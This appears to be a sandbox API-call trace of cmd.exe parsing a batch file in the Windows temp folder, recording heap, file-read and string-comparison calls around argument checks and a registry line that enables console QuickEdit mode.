0x19a8f1ecc80 [0174.598] GetProcessHeap () returned 0x19a8f1e0000 [0174.598] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb6b0 [0174.598] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0174.598] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.599] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x52e [0174.599] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efeb60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efeb60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.599] SetFilePointer (in: hFile=0x88, lDistanceToMove=1354, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x54a [0174.599] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if /i \"%%#\"==\"r2\" set r2=1\r\n", cbMultiByte=28, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="if /i \"%%#\"==\"r2\" set r2=1\r\nit was initiated by x86/ARM32 process on ARM64 Windows\r\nit Windows\r\nShell\\v1.0\\;%PATH%\"\r\n=====================\r\n") returned 28 [0174.599] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.599] GetFileType (hFile=0x88) returned 0x1 [0174.599] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.599] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x54a [0174.599] GetProcessHeap () returned 0x19a8f1e0000 [0174.599] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0174.599] GetProcessHeap () returned 0x19a8f1e0000 [0174.600] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0174.600] GetProcessHeap () returned 0x19a8f1e0000 [0174.600] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1e6050 [0174.600] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0174.600] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0174.600] _wcsicmp (_String1="IF", _String2="if") returned 0 [0174.600] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0174.600] GetProcessHeap () returned 0x19a8f1e0000 [0174.600] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ea4b0 [0174.600] GetProcessHeap () returned 0x19a8f1e0000 [0174.600] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1ecc20 [0174.601] GetProcessHeap () returned 0x19a8f1e0000 [0174.601] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb8f0 [0174.601] GetProcessHeap () returned 0x19a8f1e0000 [0174.601] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb8f0, Size=0x1a) returned 0x19a8f1eb920 [0174.601] GetProcessHeap () returned 0x19a8f1e0000 [0174.601] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb920) returned 0x1a [0174.601] _wcsicmp (_String1="/i", _String2="/I") returned 0 [0174.601] GetProcessHeap () returned 0x19a8f1e0000 [0174.601] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ea570 [0174.601] GetProcessHeap () returned 0x19a8f1e0000 [0174.601] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb6e0 [0174.601] _wcsicmp (_String1="ERRORLEVEL", _String2="\"%#\"") returned 67 [0174.601] _wcsicmp (_String1="EXIST", _String2="\"%#\"") returned 67 [0174.601] _wcsicmp (_String1="CMDEXTVERSION", _String2="\"%#\"") returned 65 [0174.601] _wcsicmp (_String1="DEFINED", _String2="\"%#\"") returned 66 [0174.601] _wcsicmp (_String1="NOT", _String2="\"%#\"") returned 76 [0174.601] GetProcessHeap () returned 0x19a8f1e0000 [0174.601] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb770 [0174.601] GetProcessHeap () returned 0x19a8f1e0000 [0174.601] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb8f0 [0174.601] _wcsicmp (_String1="set", _String2=")") returned 74 [0174.601] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0174.601] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0174.601] _wcsicmp (_String1="IF", _String2="set") returned -10 [0174.602] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0174.602] _wcsicmp (_String1="REM", _String2="set") returned -1 [0174.602] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0174.602] GetProcessHeap () returned 0x19a8f1e0000 [0174.602] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ea630 [0174.602] GetProcessHeap () returned 0x19a8f1e0000 [0174.602] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1eca40 [0174.602] GetProcessHeap () returned 0x19a8f1e0000 [0174.602] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb7a0 [0174.602] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0174.602] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.602] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x54a [0174.602] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efeb30, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efeb30*=0x1fff, lpOverlapped=0x0) returned 1 [0174.602] SetFilePointer (in: hFile=0x88, lDistanceToMove=1379, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0174.602] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if /i \"%%#\"==\"-qedit\" (\r\n", cbMultiByte=25, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="if /i \"%%#\"==\"-qedit\" (\r\n1\r\nit was initiated by x86/ARM32 process on ARM64 Windows\r\nit Windows\r\nShell\\v1.0\\;%PATH%\"\r\n=====================\r\n") returned 25 [0174.602] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.603] GetFileType (hFile=0x88) returned 0x1 [0174.603] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.603] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0174.603] GetProcessHeap () returned 0x19a8f1e0000 [0174.603] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0174.603] GetProcessHeap () returned 0x19a8f1e0000 [0174.604] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0174.604] GetProcessHeap () returned 0x19a8f1e0000 [0174.604] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ea6f0 [0174.604] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0174.604] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0174.604] _wcsicmp (_String1="IF", _String2="if") returned 0 [0174.604] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0174.604] GetProcessHeap () returned 0x19a8f1e0000 [0174.604] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ea7b0 [0174.604] GetProcessHeap () returned 0x19a8f1e0000 [0174.604] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1ecca0 [0174.604] GetProcessHeap () returned 0x19a8f1e0000 [0174.604] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb7d0 [0174.604] GetProcessHeap () returned 0x19a8f1e0000 [0174.604] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb7d0, Size=0x1a) returned 0x19a8f1eb950 [0174.604] GetProcessHeap () returned 0x19a8f1e0000 [0174.604] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb950) returned 0x1a [0174.604] _wcsicmp (_String1="/i", _String2="/I") returned 0 [0174.604] GetProcessHeap () returned 0x19a8f1e0000 [0174.604] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ea870 [0174.604] GetProcessHeap () returned 0x19a8f1e0000 [0174.605] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb7d0 [0174.605] _wcsicmp (_String1="ERRORLEVEL", _String2="\"%#\"") returned 67 [0174.605] _wcsicmp (_String1="EXIST", _String2="\"%#\"") returned 67 [0174.605] _wcsicmp (_String1="CMDEXTVERSION", _String2="\"%#\"") returned 65 [0174.605] _wcsicmp (_String1="DEFINED", _String2="\"%#\"") returned 66 [0174.605] _wcsicmp (_String1="NOT", _String2="\"%#\"") returned 76 [0174.605] GetProcessHeap () returned 0x19a8f1e0000 [0174.605] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb710 [0174.605] GetProcessHeap () returned 0x19a8f1e0000 [0174.605] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x22) returned 0x19a8f1eb740 [0174.605] GetProcessHeap () returned 0x19a8f1e0000 [0174.605] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ea930 [0174.605] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.605] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0174.605] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe8c0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe8c0*=0x1fff, lpOverlapped=0x0) returned 1 [0174.605] SetFilePointer (in: hFile=0x88, lDistanceToMove=1443, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5a3 [0174.605] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="reg add HKCU\\Console /v QuickEdit /t REG_DWORD /d \"1\" /f 1>nul\r\n", cbMultiByte=64, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="reg add HKCU\\Console /v QuickEdit /t REG_DWORD /d \"1\" /f 1>nul\r\ns on ARM64 Windows\r\nit Windows\r\nShell\\v1.0\\;%PATH%\"\r\n=====================\r\n") returned 64 [0174.606] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.606] GetFileType (hFile=0x88) returned 0x1 [0174.606] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.606] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5a3 [0174.606] GetProcessHeap () returned 0x19a8f1e0000 [0174.606] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0174.606] GetProcessHeap () returned 0x19a8f1e0000 [0174.607] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0174.607] _wcsicmp (_String1="FOR", _String2="reg") returned -12 [0174.607] _wcsicmp (_String1="FOR/?", _String2="reg") returned -12 [0174.607] _wcsicmp (_String1="IF", _String2="reg") returned -9 [0174.607] _wcsicmp (_String1="IF/?", _String2="reg") returned -9 [0174.607] _wcsicmp (_String1="REM", _String2="reg") returned 6 [0174.607] _wcsicmp (_String1="REM/?", _String2="reg") returned 6 [0174.607] GetProcessHeap () returned 0x19a8f1e0000 [0174.607] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee310 [0174.607] GetProcessHeap () returned 0x19a8f1e0000 [0174.607] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec9c0 [0174.607] GetProcessHeap () returned 0x19a8f1e0000 [0174.607] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x7e) returned 0x19a8f1ecfa0 [0174.607] GetProcessHeap () returned 0x19a8f1e0000 [0174.607] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x38) returned 0x19a8f1e0fb0 [0174.607] GetProcessHeap () returned 0x19a8f1e0000 [0174.608] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecb60 [0174.608] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.608] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5a3 [0174.608] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe860, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe860*=0x1fff, lpOverlapped=0x0) returned 1 [0174.608] SetFilePointer (in: hFile=0x88, lDistanceToMove=1513, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5e9 [0174.608] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="rem check the code below admin elevation to understand why it's here\r\n", cbMultiByte=70, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="rem check the code below admin elevation to understand why it's here\r\nRM64 Windows\r\nit Windows\r\nShell\\v1.0\\;%PATH%\"\r\n=====================\r\n") returned 70 [0174.608] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.608] GetFileType (hFile=0x88) returned 0x1 [0174.608] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.608] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5e9 [0174.608] GetProcessHeap () returned 0x19a8f1e0000 [0174.608] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0174.608] GetProcessHeap () returned 0x19a8f1e0000 [0174.609] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0174.609] GetProcessHeap () returned 0x19a8f1e0000 [0174.609] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee0d0 [0174.609] _wcsicmp (_String1="FOR", _String2="rem") returned -12 [0174.609] _wcsicmp (_String1="FOR/?", _String2="rem") returned -12 [0174.609] _wcsicmp (_String1="IF", _String2="rem") returned -9 [0174.609] _wcsicmp (_String1="IF/?", _String2="rem") returned -9 [0174.609] _wcsicmp (_String1="REM", _String2="rem") returned 0 [0174.610] _wcsicmp (_String1="REM/?", _String2="rem") returned 47 [0174.610] GetProcessHeap () returned 0x19a8f1e0000 [0174.610] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee550 [0174.610] GetProcessHeap () returned 0x19a8f1e0000 [0174.610] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1eca60 [0174.610] GetProcessHeap () returned 0x19a8f1e0000 [0174.610] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb980 [0174.610] GetProcessHeap () returned 0x19a8f1e0000 [0174.610] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb980, Size=0x1e) returned 0x19a8f1eecc0 [0174.610] GetProcessHeap () returned 0x19a8f1e0000 [0174.610] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eecc0) returned 0x1e [0174.611] GetProcessHeap () returned 0x19a8f1e0000 [0174.611] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x94) returned 0x19a8f1ea9f0 [0174.611] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.611] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5e9 [0174.611] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efe830, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe830*=0x1fff, lpOverlapped=0x0) returned 1 [0174.611] SetFilePointer (in: hFile=0x88, lDistanceToMove=1516, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5ec [0174.611] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=")\r\n", cbMultiByte=3, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr=")\r\n check the code below admin elevation to understand why it's here\r\nRM64 Windows\r\nit Windows\r\nShell\\v1.0\\;%PATH%\"\r\n=====================\r\n") returned 3 [0174.611] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.611] GetFileType (hFile=0x88) returned 0x1 [0174.611] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.611] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5ec [0174.611] GetProcessHeap () returned 0x19a8f1e0000 [0174.611] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0174.611] GetProcessHeap () returned 0x19a8f1e0000 [0174.612] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0174.612] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0174.612] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.612] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5ec [0174.612] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efeb00, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efeb00*=0x1fff, lpOverlapped=0x0) returned 1 [0174.612] SetFilePointer (in: hFile=0x88, lDistanceToMove=1519, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5ef [0174.612] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=")\r\n", cbMultiByte=3, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr=")\r\n check the code below admin elevation to understand why it's here\r\nRM64 Windows\r\nit Windows\r\nShell\\v1.0\\;%PATH%\"\r\n=====================\r\n") returned 3 [0174.612] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.613] GetFileType (hFile=0x88) returned 0x1 [0174.613] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.613] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5ef [0174.613] GetProcessHeap () returned 0x19a8f1e0000 [0174.613] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0174.613] GetProcessHeap () returned 0x19a8f1e0000 [0174.613] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0174.613] _tell (_FileHandle=3) returned 1519 [0174.613] _close (_FileHandle=3) returned 0 [0174.614] GetProcessHeap () returned 0x19a8f1e0000 [0174.614] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x58) returned 0x19a8f1f89a0 [0174.614] GetProcessHeap () returned 0x19a8f1e0000 [0174.614] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1eccc0 [0174.614] GetProcessHeap () returned 0x19a8f1e0000 [0174.614] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec900 [0174.614] GetProcessHeap () returned 0x19a8f1e0000 [0174.614] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1ecce0 [0174.614] _get_osfhandle (_FileHandle=1) returned 0x24 [0174.614] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0174.614] _get_osfhandle (_FileHandle=1) returned 0x24 [0174.614] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0174.615] _get_osfhandle (_FileHandle=0) returned 0x20 [0174.615] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0174.616] SetConsoleInputExeNameW () returned 0x1 [0174.616] GetConsoleOutputCP () returned 0x1b5 [0174.616] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0174.616] SetThreadUILanguage (LangId=0x0) returned 0x409 [0174.617] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.617] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.617] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.617] SetFilePointer (in: hFile=0x88, lDistanceToMove=1519, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5ef [0174.617] GetProcessHeap () returned 0x19a8f1e0000 [0174.617] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecce0) returned 1 [0174.617] GetProcessHeap () returned 0x19a8f1e0000 [0174.617] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec900) returned 1 [0174.617] GetProcessHeap () returned 0x19a8f1e0000 [0174.617] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eccc0) returned 1 [0174.617] GetProcessHeap () returned 0x19a8f1e0000 [0174.618] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f89a0) returned 1 [0174.618] GetProcessHeap () returned 0x19a8f1e0000 [0174.618] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ea9f0) returned 1 [0174.618] GetProcessHeap () returned 0x19a8f1e0000 [0174.618] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eecc0) returned 1 [0174.618] GetProcessHeap () returned 0x19a8f1e0000 [0174.618] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eca60) returned 1 [0174.618] GetProcessHeap () returned 0x19a8f1e0000 [0174.618] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee550) returned 1 [0174.618] GetProcessHeap () returned 0x19a8f1e0000 [0174.619] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee0d0) returned 1 [0174.619] GetProcessHeap () returned 0x19a8f1e0000 [0174.619] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecb60) returned 1 [0174.619] GetProcessHeap () returned 0x19a8f1e0000 [0174.619] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0fb0) returned 1 [0174.619] GetProcessHeap () returned 0x19a8f1e0000 [0174.620] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecfa0) returned 1 [0174.620] GetProcessHeap () returned 0x19a8f1e0000 [0174.620] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec9c0) returned 1 [0174.620] GetProcessHeap () returned 0x19a8f1e0000 [0174.620] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee310) returned 1 [0174.620] GetProcessHeap () returned 0x19a8f1e0000 [0174.620] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ea930) returned 1 [0174.620] GetProcessHeap () returned 0x19a8f1e0000 [0174.621] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb740) returned 1 [0174.621] GetProcessHeap () returned 0x19a8f1e0000 [0174.621] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb710) returned 1 [0174.621] GetProcessHeap () returned 0x19a8f1e0000 [0174.621] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb7d0) returned 1 [0174.621] GetProcessHeap () returned 0x19a8f1e0000 [0174.621] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ea870) returned 1 [0174.621] GetProcessHeap () returned 0x19a8f1e0000 [0174.621] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb950) returned 1 [0174.621] GetProcessHeap () returned 0x19a8f1e0000 [0174.621] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecca0) returned 1 [0174.621] GetProcessHeap () returned 0x19a8f1e0000 [0174.622] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ea7b0) returned 1 [0174.622] GetProcessHeap () returned 0x19a8f1e0000 [0174.622] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ea6f0) returned 1 [0174.622] GetProcessHeap () returned 0x19a8f1e0000 [0174.622] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb7a0) returned 1 [0174.622] GetProcessHeap () returned 0x19a8f1e0000 [0174.622] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eca40) returned 1 [0174.622] GetProcessHeap () returned 0x19a8f1e0000 [0174.623] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ea630) returned 1 [0174.623] GetProcessHeap () returned 0x19a8f1e0000 [0174.623] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0174.623] GetProcessHeap () returned 0x19a8f1e0000 [0174.623] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb770) returned 1 [0174.623] GetProcessHeap () returned 0x19a8f1e0000 [0174.623] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6e0) returned 1 [0174.623] GetProcessHeap () returned 0x19a8f1e0000 [0174.623] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ea570) returned 1 [0174.623] GetProcessHeap () returned 